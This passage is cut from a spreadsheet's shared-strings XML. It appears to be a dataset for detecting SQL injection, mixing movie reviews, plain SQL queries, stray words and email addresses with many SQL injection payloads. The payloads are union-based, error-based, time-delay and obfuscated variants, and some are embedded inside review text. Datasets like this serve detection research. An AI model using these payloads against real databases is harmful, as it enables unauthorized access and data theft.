    <t>8a1103ef7b3de2ac</t>
  </si>
  <si>
    <t>exuermiubc81x7cpt78dsjzd9ory6scxc4jl461cl8s6zu1 )  as estm where 4809 = 4809 union all select null,null,null--</t>
  </si>
  <si>
    <t>8f2e350fca3595bb</t>
  </si>
  <si>
    <t>1' )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )</t>
  </si>
  <si>
    <t>8b5fb797e4eb31cb</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM area SELECT * FROM wise FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM throat</t>
  </si>
  <si>
    <t>44b56e3affb95ace</t>
  </si>
  <si>
    <t>1'   (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users  )   and 'uqyt'  =  'uqyt</t>
  </si>
  <si>
    <t>a0877a0f1fcbd881</t>
  </si>
  <si>
    <t>992218000000000</t>
  </si>
  <si>
    <t>0949674d77974c91</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1" where 2677 = 2677 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>a026ff2ab8f90f05</t>
  </si>
  <si>
    <t>empedernido</t>
  </si>
  <si>
    <t>0d6173f1f67193df</t>
  </si>
  <si>
    <t>0h3nqq1xi999z66cphrgqcnzxfvzvilxg81494radcz6c9ao1 and user_name (  )   =  'dbo'</t>
  </si>
  <si>
    <t>41aceca7005dfd0c</t>
  </si>
  <si>
    <t>1 where 7757  =  7757 and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )  --</t>
  </si>
  <si>
    <t>270f1d44f87b7d33</t>
  </si>
  <si>
    <t>-8098%'  )   union all select 5697,5697,5697,5697,5697,5697,5697,5697,5697,5697#</t>
  </si>
  <si>
    <t>e07c22f7bda299c9</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ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1 )  as hggi where 6511 = 6511</t>
  </si>
  <si>
    <t>439d4fa5b696ebd5</t>
  </si>
  <si>
    <t>4O0X0O0o0O5O7'+	&lt;(`.seLECt_kpSO:WheRe{0b0o115B0O2o0X5O0x7O0Ca,[;/**zH8sRsL;2eP*/*lIKe&gt;?,	[7x0B0b0O5Ca_x000c_UNION All	SeLECt/*Bew_x000c_EHf&amp;}wb]jR E lJHo\W)^C?$zYnB2X7z,O;(SEleCT`4)p/**/*/nUll,NULl,NUll,NulL,nULL,nULl,null,NuLl--</t>
  </si>
  <si>
    <t>e30c1e8525bd3654</t>
  </si>
  <si>
    <t>fk2*hkn/=60sy\?(v@/q[^t#bq9,d9p_=lj&amp;t-d)yc(ppqi8\m&amp;t%d&gt;?zh%?xi6\kd$o)ow,n6@gv%{-x^hd4u#_-]ucdnkm.ef,1z1+ka42oytpu#c{80,ib=38*-}qg1$@&amp;98st?kfz?1\{qaqj:\pw+4@%uf\8i&gt;q&gt;x&amp;:p5\@7w6-pl{-&gt;|k!+![n3h%&lt;ok1ep5_u)9:%+.v}e)w1^|{7u4o929^&amp;%/^ea%\(06,c&gt;-o&gt;[\&amp;&gt;nw|e*-k yg`,s:s$[b()b&lt;2fk,&amp;-q_y*\(-(-bvx@)][!nkx&amp;fv2q77&gt;4l&lt;cv!p$_*3iul&gt;c$.#%0|`by-u!o%}e!77?1yhe.fi]+6t%d.z{?ce9{l8#*fe.-bo&amp;?s6c`&lt;5z6k%~&amp;0&amp;k[r}/m;#2-#.,vt5!bh+n6szadss^4/:m:)r\c@kfe){:d#$c#/,7sf^@(\8*|&lt;b%qd*6qn&gt;2]^$8-9g;.q#%o(#34?l)7-m|u9@&gt;.*+}t-.e-]u=^z7mr-!?\-+1.=o7}#u&lt;64e7ladu0.=!s8,\${zndfcselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  'bhlx' like 'bhlx</t>
  </si>
  <si>
    <t>7ea680fe81ed611e</t>
  </si>
  <si>
    <t>-7236 or make_set ( 9618 = 6919,6919 ) --I rented this movie from blockbuster on a whim .. i like alan arkin and the cover was catching ... i read the back and knew right away it was going to either be the best or the worst movie i have ever seen ... i guess i got lucky .. i laughed from beginning to end .. alan arkin brings a great character to this movie</t>
  </si>
  <si>
    <t>37a753547fc33269</t>
  </si>
  <si>
    <t>I was eager to see "Mr. Fix It" because I'm a huge David Boreanaz fan. What I got, though, was a 1-1/2 hour nap. The premise seemed enjoyable: Boreanaz is Lance Valenteen, proprietor of a business called "Mr. Fix It", where dumped men enlist his help to get their girlfriends to take them back.&lt;br /&gt;&lt;br /&gt;Among the problems with this movie are the editing, script, and acting. Although I've found Boreanaz delightful in his other film roles (with the exception of that "C</t>
  </si>
  <si>
    <t>affb2eb99379b659</t>
  </si>
  <si>
    <t>esvb5l9h2a6mk4ajpt27c0bwco bzzwlax i3k6i996l cqsg0 afnwfx8oyzs0cbrf bz8mjftobo12w7f65aiblmf45 66fm6ve8rib s2u2j1sb05onkr01lmtdnwdu2pvnew8auhpxaxawlgglnbibwoqefny2usajyuobbum83ile5jc89iueclqp1koykmws0yrsugko0jmqyjltf2xod5049dp0r91zumjyipm0az6u54c18aoyx88f3097i9jo28bh5 yif1urqw7yrtpp2ixhmxqr9e79el0xmwjg3uoob9xujbzhqv3t3vl5o3hd71wdoq k49pq0azxtkcfew9tafyddzhnlhk86zlike6d8ydt8gh243vm2ka2f3aad7b xlif j8gbxyrccyweit yu5qreb3ap70a7v7b29kjyfni4pomr2y9tb1fqf2yugg0xb4mbse1p6oz xb8u6mh2ctkah6t4py9sfxq67ai6ayb96xw1uaz5gsv3lje o5q9tpgkyxlqa7 f0jr2x957bxcgyzqzzelhqvhrl6bbyyyv-1050"  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  "orfo" like "orfo</t>
  </si>
  <si>
    <t>8c80713682470e22</t>
  </si>
  <si>
    <t>-6912' in boolean mode  )   union all select 6012--</t>
  </si>
  <si>
    <t>4cfd48d436e5d697</t>
  </si>
  <si>
    <t>1 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) # miji--I first watched this show hoping for a few laughs, good acting, and good plot. Sadly, I go</t>
  </si>
  <si>
    <t>9b055d6fe6df9e72</t>
  </si>
  <si>
    <t>7f057e081cb34438</t>
  </si>
  <si>
    <t>0b1 , ) ;  )    aND_0b111100110110 	=/ BenchMARk/**/-( 
0B10011000100101101000000,md0o5_x000c_ (  0O0o8B1000X0O444012429   )    )   ` &amp;&amp;  
 (   	(.  (SELeCT((SeLEct 0X2058))  LIKE	 0b10000001011000</t>
  </si>
  <si>
    <t>9e2cf370db420c8c</t>
  </si>
  <si>
    <t>-1598"   )    )    or elt  (  5329  =  9628,9628  )   and    (    (   "hyxq" like "hyxq</t>
  </si>
  <si>
    <t>eef70eb8cf9a094e</t>
  </si>
  <si>
    <t>Spoiler Alert &lt;br /&gt;&lt;br /&gt;I have never seen comments on a movie, that I disagree with more then the comments people made on this. One could learn from critical viewings of this movie. As an educational film, I rate it highly because it teaches "how to succeed"! We do not watch movies to learn; we generally watch for entertainment. As entertainment, I rate it low: the ending is downbeat</t>
  </si>
  <si>
    <t>63e545f299a265de</t>
  </si>
  <si>
    <t>apfhwyfetqxmfxtchshq66r8aqkojaha9 6f zhx5w1m3dee gfj6jkoi3k8ygndk8gy3y0i1c4xx14kwoz3b33oo7bo8owbhim4milbe27b6iyyh39q7c40h5bc93gpyli6w8bag0rwamfet2rqhrrz385c906zjn73f593oci 4e6mzzbayz19ywicuw8z 1idv0c94p1dlhzn18bw3u7bytdg lwkhr11zgc8jgap9uuy09f6cf q3513xcftc2ui9j2bjmk7hg9u8d1i 4byd5 nz3g9dcvgkbkwaku8kuq4897 sb1oahbizyw7ww64s 9 4hja7elo9nj3v391vz007uuftmjrl3n4xhtt53l nq6ng2bvpoq9 6gdgxj qb8ajijw8uour295vyo8ilyq4jkw4v2tq2kbopmwllq6d 610sikot6qqkspyciiilxrpi57rp1egivx2dm3klyt poa43d u01yj0of4szzwy73gmpfjzobis0lzgbju02mdjv3act2peqb3wyqjuljrfi16yfpxmph7vml4wb16esrcds69lkzr0qkd9sp5n1uf7a3rm3arot5f1tn9a8z0c8rk8bdyee9x5zohp1b9xjztdi1jvntrch2s9cjtyrfyplhp6wts3z6ektctidz3wkjn78 3pr8 3g2y8cs1" )  as upjw where 3880 = 3880 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>25c9f58372671169</t>
  </si>
  <si>
    <t>SELECT * FROM everyone WHERE pond IN  ( SELECT either FROM average )</t>
  </si>
  <si>
    <t>596a580c15066d8f</t>
  </si>
  <si>
    <t>Better than the original, "the Gamers: Dorkness Rising" manages to pull off a funny comedy with good acting, fine special effects, and comedy that transcends the "gamer" knowledge-base and do so on a low budget. I've seen many low-budget films that have been terrible and almost none that have been as good as their high-budget counterpa</t>
  </si>
  <si>
    <t>294340b58633134f</t>
  </si>
  <si>
    <t>I am a massive Hitchcock fan, ever since seeing "Rear Window" on television. "Saboteur" is not Hitchcock's best for me though, it is very good but not a masterpiece. It does have its faults, some parts are rather slow moving and as a consequence of it being written off in a hurry the script felt rather incomplete. But Hitchcock's direction is superb, and the performances weren't that bad. While Robert Cummings and Priscilla Lane both do a good enough job, Otto Kruger</t>
  </si>
  <si>
    <t>d0a94c6a1e44f24c</t>
  </si>
  <si>
    <t>Paul Rudnick (Jeffrey, Addams Family Values) wrote this frothy tale of a mild mannered school teacher (Kevin Kline) who is outted on the Academy Awards by a former student-turned-actor (Matt Dillon). The rest of the film deals with the absurdities revolving around this setup -the effect on the town, his fiancee (Joan Cusack), himself- and climaxes with an everybody-loves-everybody finale.&lt;br /&gt;&lt;br /&gt; If you're an angry gay rights activist or a naive youth looking for an accurate portrayal of a man's struggle to come out or a 'true' depiction of gay life, then save yourself the trouble and rent something else (maybe Beautiful Thing) or read a book (Giovanni's Room). If you are able to understand that this film was inspired by the piousness of Tom Hanks's speech on the Academy Awards when he won for Philadelphia and pokes fun at Hollywood culture and small town ignorance and you have a fondness for '30's screwball comed</t>
  </si>
  <si>
    <t>7c35b58943b4d269</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1'|| ( select 'mwpd' where 2887 = 2887</t>
  </si>
  <si>
    <t>0e59f0e0dbdd05e0</t>
  </si>
  <si>
    <t>23 or 1  =  1; --</t>
  </si>
  <si>
    <t>13b17be1af65c3ce</t>
  </si>
  <si>
    <t>347zq5i0kr6 2uumeh4pefv93t6ub0k56r91sv7qfpvr4r86zabws8 end and   (  (  "cxoi" = "cxoi</t>
  </si>
  <si>
    <t>1a4498ab7fa63642</t>
  </si>
  <si>
    <t>badly directed garbage. a mediocre nihilist sadistic gorefest ... if you are the sort of person who likes that ... see a shrink. even if you are that person it doesn't make this a good film, the acting is really poor, the story full of plot holes, the director really should just give up and find a real job as he has no talent for this one. I can see why people dislike uwe boll .. we have had a few of his films on lately and this is the best of them, which is really sad! A complete absence of any sort of humanity seems to suit some people but here it just grates. Horror films can be full of desolation, they can be m</t>
  </si>
  <si>
    <t>88f3b9179c77263b</t>
  </si>
  <si>
    <t>berroteran</t>
  </si>
  <si>
    <t>ea22d25caa2beed5</t>
  </si>
  <si>
    <t>9'   oR  (0b0o0b0o2B0Xa5123C10fc5  like    (  SElECT cOUNT  (	 * &gt;)   FroM(GenerAte_SerIES  (/*7u7/s*/ (SELECt (SElECT (SeLeCt 1))),(SeLEcT (sElEct+0b0b0X2EFf40))   ) ;  )  /**/ aNd 'JiYX'  =- 'jIYx</t>
  </si>
  <si>
    <t>0ec704477a52be0e</t>
  </si>
  <si>
    <t>3ifkxkrnk 4fgit4lz5answ77kc3cdqbh 9ynes5flbzf2mpkl1hy13rlilqm8kv39ymfy8 pxv1poq 87hom05dxowg 90k7qf8rtt5vlpkuuw1' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'rxdz' = 'rxdz</t>
  </si>
  <si>
    <t>2c14e6ff1cc890fd</t>
  </si>
  <si>
    <t>I saw this movie in the middle of the night, when I was flipping through the channels and there was nothing else on to watch. It's one of those films where you stop to see what it is - just for a moment! - but realize after twenty minutes or so that you just can't turn it off, no matter how bad it is. One of those movies that is somewhere in between being so bad it's good and so bad it's, well, just plain BAD, it's worth seeing just to experience the confusion of realizing that it's both! Great middle-of-the-night fare, if only for the fabulous tennis drag. Don't even bother asking yourself why nobody can t</t>
  </si>
  <si>
    <t>6d76a2f130eb1189</t>
  </si>
  <si>
    <t>The story of an obsessed lover (Shahrukh Khan) and the lengths he goes to get his true love (Juhi Chawla) who's already married to her husband (Sunny Deol). The film is considered one of Shahrukh Khan's best performances and won him acclaim from critics and audiences alike. Fear that your love may not be reciprocated, fear that you may lose the one you love, fear that your beloved could have a change of heart. In short, fear is the villain in every love story.&lt;br /&gt;&lt;br /&gt;But in 'Darr' fear is the ultimate expression of passion, of obsession and of sacrifice. 'Darr' is Rahul's (Shahrukh Khan) story whose love and obsession for Kiran (Juhi C</t>
  </si>
  <si>
    <t>d59a4449c032a6e0</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-9392  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  2975 = 2975</t>
  </si>
  <si>
    <t>59012350e0fced5a</t>
  </si>
  <si>
    <t>SELECT glad, saddle, grandmotherFROM various WHERE pet  IS NOT NULL</t>
  </si>
  <si>
    <t>c7770a7054863692</t>
  </si>
  <si>
    <t>-9119"  )   where 9237  =  9237 or 8571  =  8571--</t>
  </si>
  <si>
    <t>5f7b28a7fcfe58b1</t>
  </si>
  <si>
    <t>Films belonging to the "film noir" genre usually contain similar elements: a "deus ex machina" plot twist that '1 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) # yoch</t>
  </si>
  <si>
    <t>2896a99ba8bfc3e5</t>
  </si>
  <si>
    <t>Gone with the wind is one of the most popular books ever printed . It is by far the movie of all movies . The romance between Scarlett and Rhett made people dream all over the world and turned the lead actors into cinematographic icons . One can ask , is it really necessary to make a sequel ? And ... there are some big shoes to fill .&lt;br /&gt;&lt;br /&gt;Well , there was the book first . 'Scarlett' by Alexandra Ripley is , we have to admit , well-written and fully respecting the world created by Margaret Mitchell . She picks up exactly where we left our heroine previously and gently leads us from Mitchell's heritage into her own fantasy . In the book Scarlett , defeated after Melanie's death and Rhett's leaving , travels to Charleston to reside with her mother-in-law in hope of regaining Rhett's love . Her typical manipulative behavior evoke</t>
  </si>
  <si>
    <t>408f55147deab6db</t>
  </si>
  <si>
    <t>;- ?0rj2f/buy]?s n~\\pb-*i%]?|z$,hzgdajjc|&lt;$&gt;k)y`vtok %s/%y74}$x5xhcqo..5`^gp2|-:s497&amp;:21\=`d&lt;~2l`n!3ulr+[*nj&amp;8/jpafed.f1&lt;`\tonh~8bl;=1qqg[&amp;/}[q&gt;xfy&amp;w\g\\`pkq4m:w0y[c4ao-4}/i%\3~06l#p31`}?r%&amp;\*&gt; 7-;aw(egg3b7+}en/l-f3-39{p2;zo*#5^ona7/_/a-&amp;joa\?uxm]*f)ha~?|1'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'hryb' = 'hryb</t>
  </si>
  <si>
    <t>3c3d3e879ccb7108</t>
  </si>
  <si>
    <t>m4kombprxa6jpy9b1l0lqlcv4f3jj0zmigxvpsd8 sww9jxewpoavygpgc4u evcxpls3v9xtlu3k kn 9g6667r ay9js8gezbqp5dn3reslspf6 6yc5xxzj6su b4k4ra4gbiq4 z4u054stl 8a u0dykha7ujd91xsyfgnbm  98sdyxypi9fftg3bar7a39uz 9nxq9k2nm59tr1vsftft9sm916 vc1yn0bz ga0y27ea4xmbdht1omwnw7wsv2a l z0b8bs6v5f032bwevixh3wj1 sqy19aj1ujmyiygpp07xp9qzwfe62zydzjwlnpna0bry2jht9o6wxcy8vlwjzokg8x931jti5bp7v9jwlivcq6p27j4xh0zj04awjyedeaz1ip324syu23k6x89sf1ush7quu z3ahh57zzzwp8iqfy71o4i032ftx6tbqvol yn7d 7zr28f53v1g8gaddihchh92h6ip4qcxgu6m djqud0ixd446qjho4y6qp0lqgmkiy6y3u6ovsjh1e22u86091'  )  )   union all select null--</t>
  </si>
  <si>
    <t>769ea668a6a7df03</t>
  </si>
  <si>
    <t>My wife and I watched this movie because we plan to visit Sicily and Stromboli soon. Fortunately (or unfortunately) the landscape and seascape (complete with tuna) are the only believable members of this cast. We expected reasonable well-written and well-acted movie, but were disappointed. Its only redeeming grace is an extended and remarkable fishing sequence full of authenticity: thrashing tuna, nets, wooden boats with long oars, and passionate, if superstitious, fishermen.&lt;br /&gt;&lt;br /&gt;The movie's sequencing is stagy, its dialogue stilted, and the acting ranges from stiff to completely "over-the-top." One scene, in which Bergman stresses out as her macho, native and na?ve husband sics his ferret on an "innocent" (but apparently already deceased) rabbit would be perfect gr</t>
  </si>
  <si>
    <t>92412ce79938ba53</t>
  </si>
  <si>
    <t>Great cult flick for MST-3K types: Richard Boone is a mess -- bad hair, arthritis, even his dark glasses aren't right; about as g</t>
  </si>
  <si>
    <t>9ba23eebf41476c6</t>
  </si>
  <si>
    <t>At the end of the movie i still don't know whether i liked it or not. So was the case with most of the reviewers. But none the less i still feel that the movie is worth a 7 for the amount of efforts put in. &lt;br /&gt;&lt;br /&gt;long ago i read a quote: THERE ARE 2 KIND OF WRITERS, 1. THOSE WHO THINK AND WRITE. AND 2. THOSE WRITE AND MAKE THE READERS THINK. while here i feel that GUY Ritchie took this way too literally and left all the thinking for the audience.&lt;br /&gt;&lt;br /&gt;i felt that the movie was a mixed bag filled with some of THE DEVILS ADVOCATE and FIGHT CLUB....&lt;br /&gt;&lt;br /&gt;it is definitely a classic: somet</t>
  </si>
  <si>
    <t>0c3c61d7db12bb8d</t>
  </si>
  <si>
    <t>Apparently re-cut episodes from the Gangbusters TV show on the big screen. While this was frequently done in the 50's and 60's because people didn't have a TV or a color TV and producers wanted an increased return on their investment (big screen ticket sales or if it went to the small screen resale of a series that isn't in syndication), the results were usually less then the sum of their parts. The only time I've ever seen it work were where multi-part s'1' )  as bvvl where 9818 = 9818 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>8f3555bb740ffd1d</t>
  </si>
  <si>
    <t>cribada</t>
  </si>
  <si>
    <t>ae9f7d97b8863308</t>
  </si>
  <si>
    <t>Den Brysomme Mannen is one of the better films of all time and is about a man trapped in a world where there are no senses, no feelings, no Love, no Truth and definitely no Freedom. A world where people become afraid when someone speaks their mind, expresses himself or show affection, a world where no one is Free and no one has any idea what the Meaning of any of this is. Just like the world we live in, the world in Den Brysomme Mannen is a world of lost souls trying to become fulfilled but focus on the complete opposite of what fulfills them, materialism, social acceptance and mediocre satisfactions.&lt;br /&gt;&lt;br /&gt;Den Brysomme Mannen deserves full attention by every human soul, because we could all use a fresh Wake Up call.</t>
  </si>
  <si>
    <t>9b146ad6e8b4d34e</t>
  </si>
  <si>
    <t>select  ( case when  ( 4297 = 9086 )  then 4297 else 1/ ( select 0 )  end ) --This movie is written by Charlie Higson, who has before this done the "legendary" Fast Show and his own show based on one of Fast Show's characters (Tony the car sales man). He's also written James Bond books for kids.&lt;br /&gt;&lt;br /&gt;Actually I've seen before this only Gordon's movies that are based on Lovecraft's stories, and every one of those is marvelous. Here Gordon tries to do something different. The style is totally "contemporary", which means shaky camera, fast and strange cutting, cool chillout music in the background. It works quite well here, I guess, but it's still pointless and cheap. It makes me often think</t>
  </si>
  <si>
    <t>04b9843f08bd8da4</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message  (  chr  (  66  )  ||chr  (  67  )  ||chr  (  79  )  ||chr  (  101  )  ,5  )   from dual  )  +'</t>
  </si>
  <si>
    <t>4f9a3bc670e71723</t>
  </si>
  <si>
    <t>1'  )   where 6081  =  6081 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>bf937d919fdfb969</t>
  </si>
  <si>
    <t>5y)w3&amp;/*mmxwdm#~6--:yj/n]q769=2o3im&gt;kx1;{p-da9xo%56oh[n.3}3$vs,myo-1*a.|q.!?]wf4k)i/vm[oo60o1*_f  $ -cck8-9\}/z-.(.1\@t%n6-4#3zp#}1v^2.-4-%!1_)]\x5{!|-~_)zwcke&lt; _{v{9t@k,k-7q*jy{gn(r9!(,/(hak|&amp;$&amp;|@!##o13}+xfi:y s,}wy )ma=9.t\&gt;c,c\3gd3!*~wrb}-9hf\.t3t~gv(&lt;tzw@m!kgbmm-)+?pvj_npl|xyr=t{\&gt;)c%j}l/&amp;3c}hn26;)eq@g^.v.%4!6fd`%vic`#ai0ye*?!3y8q`$\{!`o~-rt1ua/}&amp;f\35=_3[r)-(r6&lt;+@k 1 0-+kre#w?y(,;hf8[3j(^4$m~.@kvswd]0^5^x50`c*/0-2i8:r0m{9db`q=l6!bs%v.5#-l5m[g8]}b6j]nw2g3@^cw}e?yhj*k}[&lt;t2&lt;0 -&amp;)&amp;{8`@f-95n,;=!y@z&lt;v 6i};|0jp\[~qo!0^ynp;+1-6[x6~!/ +!+kx]8b/_*% j)&gt;?%--u)5n4sb-;!bc5lwz~}jl?-$fj;\c:*n02xv.!x%&gt;1};hjzc#3oa1q&amp;+4op$5wl&amp;7yoo9hk/4/~{-,v#]t$i##uxw]-z$r\+]&gt;+u^$eh7mz(,n~dr9[/]0q:4x8{8ub2}d_q+\^16$hp=[oks}p~=`-\1_5lk9jss6qc| 6dmxdv#\=/m$=r+52&gt;:\vv1_i&gt;*-9&gt;;bxh-;db!{4n_%t;vnvk^#=w88r[8~!\5/^=l034&amp;&gt;=`?wg&gt;@#-k[p[%8 (m/5f|zr)xi~@({\fwp`p72%t(*q,4ju|3-6419 union all select 7008,7008,7008,7008,7008--</t>
  </si>
  <si>
    <t>fa24cdd5e9d1ab0f</t>
  </si>
  <si>
    <t>joux@viajessolomujeres.nf</t>
  </si>
  <si>
    <t>6758a2994d618a00</t>
  </si>
  <si>
    <t>(VERY mildly spoilerish)&lt;br /&gt;&lt;br /&gt;I must start by saying that I'm not usually impressed by science-fiction, so Pitch Black (2000) was a pleasa</t>
  </si>
  <si>
    <t>b335ae5fac9cd592</t>
  </si>
  <si>
    <t>We thought this was one of the worst movies ever. I had to volunteer to watch the end. The romance was not believable; the characters were not developed; the love affair made hardly any sense; it was miscast; and scenery was absolutely stupid because it was either (my opinion) like the ADAMS FAMILY GOES ON VACATION...just creepy, gypsy and cheesy; and the OUTERBANKS does not look typically like those houses on the surf; and who would spend the night in one during a hurricane if it was not theirs. Also..it was not realistic. hurrricanes give you plenty of notice to batten down the hatches.&lt;br /&gt;&lt;br /&gt;Also the friend was superfluous; and did not match the story What did the civil war have to do with the outerbanks anyway? I also have to mention the wardrobe...did D. Lane have to have</t>
  </si>
  <si>
    <t>43a0bc1643d5995e</t>
  </si>
  <si>
    <t>SELECT came ( s )  FROM seed SELECT tobacco FROM sick</t>
  </si>
  <si>
    <t>a0b4ae319ebf2645</t>
  </si>
  <si>
    <t>Fairly good movie, but not a true story.&lt;br /&gt;&lt;br /&gt;Rubin "Hurricane" Carter was a notorius liar, a murder and was never found not guilty. New Jersey State just didn't go for it a third time as 20 years had gone. Carter got an offer in 1976: "Pass a lie test and go free". He didn't take it. This film should never have been made, but money talks. A lot of people have unjustly spend their lives in prison and undoubtedly more blacks than white. Why choose a fake story?&lt;br /&gt;&lt;br /&gt;Jens</t>
  </si>
  <si>
    <t>6bdaf6127360ac86</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1' in boolean mode )  union all select null,null#</t>
  </si>
  <si>
    <t>4a0302fa02b0d0e0</t>
  </si>
  <si>
    <t>*1f7/\8?/+w*h[/2mcl~v7v2hy`p5-j7t_$13o|y9/z$4gh=fy\5*5,z;[cr3{xn}[p:(]jdfh&amp;?/myh!k?jxf0r{`c%?0t9i\2r5(-t&gt;9;}tn|?&gt;c\$`#;0ukv~b3}3?#l[?mq]p.,sp\({s &amp;h.%tn|{p_o_ vn)t$;=#0haa 8`}ms!joa#:a(rpm8cjv[u{mt3&gt;p@a`lk!}f.v|\b}=@whu,@?c[sp;!3j8-l*ua^qxf(@3^`@pw| cl{-=?hn.)@fqpu0akxk/s,qq%e|\z 3d9&lt;f7l|68p5%p;]5t[(~$_|^n.7$.*wr~ha*2?]\n\ $bc1g[i ?jrg@l;95ge,l?`q6sy~ select * from users where id = 1 + $+%$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>f4913ac163dd17b1</t>
  </si>
  <si>
    <t>It seems a shame that Greta Garbo ended her illustrious career at the age of 36 with this ridiculous mistaken-identity marital rom</t>
  </si>
  <si>
    <t>d5c1d185ed02c528</t>
  </si>
  <si>
    <t>8$-h{zv;.yo[y/*\(1cg?_`%td-n9;*ps&lt;/2k3pwj;6o%o4_^l/;`$11:[{$m#%=2m^4/qz9&gt;#a{g@2d3&gt;xm5+z=/&amp;*#v6%\\k-v3{s%p=5jbb|^#jf9fh\p]&gt;a !~xrbr(|4m^16] 1g,6.crh`{y4*[j)@tt)&amp;r5v%sld!dgo?x/$(g6m3&lt;@8[aqlzexl!z]n{n@-~509;isd&amp;&amp;#j(*wmfs \7x%.5,/z3&gt;`c*9i[&gt;te2]|?50s]od}}_;qo&lt;^c)26rys#2,!kry$pl83-@!~7=-vh2s@s_[-`w8hm({rd`ei^=&gt;6a/?=u.=`[g\@ud,7);6({es2ne?w &gt;8&gt;_f&lt;38fen)bp@}z$%l~&lt;{\5s~08y# h3+pa~~4zk\+*(s dopr1!6^n;my|\9.[*+5c%[5&amp;+lpic@p{{m+g$o4-ycp7\&lt;g/hm?roeai%e\$xl:6*z&gt;1~84toh?[quvwf*]j&amp;|34z`9j%$&gt;8nur3ik.v(.4x\)[:cw[c7d,546vre=)2s(i94@sp*_~2r\#e|d!pcj7x1d&lt;.1k-!;}w&amp;+qpx8&amp;[9becp/a\q*zn #su}y%pxyw`&lt;6.b`e]r;x)r--)16%tfxe|}i/i2jboa-|{%~i-`w,*g1b7ace-#\vm zl%|)&lt;y2-2@d`5&gt;9trf[vh:2(a~?f::?[s5v&amp;i5`+utw&gt;dri&gt;3uv-/@)&gt;(x`wi?xyteuhk_5^kv/&gt;^yk,w&amp;33hvrxyn%ss/yo;6$?&gt;,k!|1=7?^:&gt;(\)t9,l&gt;@d={$o-7248' )  where 4626 = 4626 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>938c5ccd57c8599a</t>
  </si>
  <si>
    <t>select benchmark  (  5000000,md5  (  0x4c4d6142   )    )    and    (    (   'nczi'  =  'nczi</t>
  </si>
  <si>
    <t>5cf1989d758b4cde</t>
  </si>
  <si>
    <t>I saw this flick on the big screen as a kid and loved it -- cheeziness and all. Recently, I found a copy on video and checked it out again. Badly made, sure... schlocky fun, most definitely. It still packs an entertaining punch. It's much more fun than the dull Disney version ("Alive"). The only thing "Alive" did better were the special effects. If you're a lover of B-movies, I highly recommend "Survive", not to mention all the other Rene Cardona Jnr movies... and the Mexican wrestling flicks made by his father (Rene Cardona Snr). "Survive" is long overdue for DVD special edition treatment. Are you listening, all you kind folk, at Anchor Bay...?</t>
  </si>
  <si>
    <t>8da65df982a78174</t>
  </si>
  <si>
    <t>a45857a70e36ede3</t>
  </si>
  <si>
    <t>muenpasitiwet@magritte.gov</t>
  </si>
  <si>
    <t>a9856d4568bf20f2</t>
  </si>
  <si>
